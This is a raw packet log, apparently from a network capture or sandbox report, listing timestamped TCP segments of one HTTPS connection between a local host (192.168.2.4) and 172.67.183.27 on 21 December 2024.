                                                                                                                                            Dec 21, 2024 20:13:46.118542910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.118551016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.118575096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.120212078 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.120371103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.120377064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.120436907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.127767086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.127779961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.127887964 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.127895117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.127937078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.132273912 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.132361889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.132365942 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.132438898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.135559082 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.135675907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.135680914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.139513016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.139590979 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.139595032 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.143374920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.143441916 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.143448114 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.146609068 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.146718025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.146724939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.148670912 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.148756981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.148761988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.148838997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.152414083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.152522087 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.152524948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.152586937 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.269988060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.270052910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.270057917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.295710087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.295794964 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.295800924 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.298772097 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.298852921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.298857927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.302864075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.302942991 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.302949905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.306314945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.306385040 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.306390047 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.311465025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.311573029 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.311577082 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.311651945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.312504053 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.312581062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.316871881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.316972971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.316977024 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.317030907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.321463108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.321537971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.321542025 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.321594954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.325548887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.325623989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.325634003 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.325665951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.325689077 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.326463938 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.326586008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.326591015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.329833031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.329912901 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.329921007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.334630013 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.334814072 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.334841967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.334889889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.334965944 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.338905096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.338996887 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.339000940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.339057922 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.340903997 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.340985060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.461951017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.461967945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.462048054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.462065935 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.462105989 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.490149021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.490160942 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.490226030 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.490231991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.490376949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.493705034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.493799925 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.501219034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.501230001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.501291990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.501297951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.501378059 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.507841110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.507852077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.507900953 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.507904053 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.507947922 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.515146017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.515156984 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.515227079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.515230894 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.515269995 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.522595882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.522608995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.522691011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.522691965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.522700071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.522808075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.529594898 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.529607058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.529731035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.529736996 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.529793024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.536833048 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.536855936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.536919117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.536919117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.536925077 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.536979914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.663902998 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.664052010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.664060116 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.684962034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.684976101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.685266972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.685273886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.692161083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.692172050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.692303896 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.692307949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.698609114 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.698621988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.698746920 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.698754072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.698853970 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.700913906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.701080084 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.708183050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.708194971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.708317995 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.708326101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.712162971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.714778900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.714791059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.714911938 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.714917898 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.715049028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.718884945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.719057083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.725856066 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.725867987 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.726078033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.726083040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.726205111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.732244968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.732397079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.732402086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.732466936 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.733321905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.733454943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.857733965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.857898951 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.857913017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.874583960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.874759912 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.874764919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.881438017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.881455898 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.881550074 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.881556034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.888947964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.888959885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.889060974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.889060974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.889069080 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.889990091 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.890250921 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.890256882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.890584946 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.895396948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.895484924 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.895530939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.895556927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.895576954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.900484085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.900665045 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.900701046 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.900738955 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.900836945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.905889988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.906049967 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.906060934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.906215906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.910283089 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.910391092 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.910428047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.910437107 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.910460949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.915311098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.916002035 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.916054010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.916057110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.916093111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.917273045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.917356968 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.919213057 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.919264078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.921624899 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.921685934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:46.924334049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:46.924407959 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.066128969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.066239119 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.066246986 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.066281080 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.066304922 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.066330910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.071471930 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.071544886 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.071551085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.071603060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.072395086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.072454929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.076756001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.076828957 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.076838970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.076881886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.076922894 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.080943108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.081016064 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.081022978 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.081073046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.082442999 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.082493067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.088460922 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.088525057 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.088530064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.088570118 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.091670990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.091722965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.093795061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.093848944 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.099338055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.099401951 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.099421978 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.099455118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.099483013 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.099492073 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.102344036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.102401018 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.105562925 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.105618954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.110388994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.110459089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.110464096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.110507965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.116604090 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.116663933 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.116688013 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.116760969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.116770029 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.158314943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.258573055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.258663893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.258677006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.258718014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.258740902 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.258758068 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.260353088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.260421991 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.263602972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.263668060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.269110918 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.269185066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.269191980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.269237995 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.274396896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.274447918 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.274451971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.274494886 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.280843973 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.280900002 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.280904055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.280944109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.286180973 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.286241055 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.286273956 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.286319971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.286361933 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.291510105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.291564941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.291574955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:47.291588068 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:47.291614056 CET49737443192.168.2.4172.67.183.27
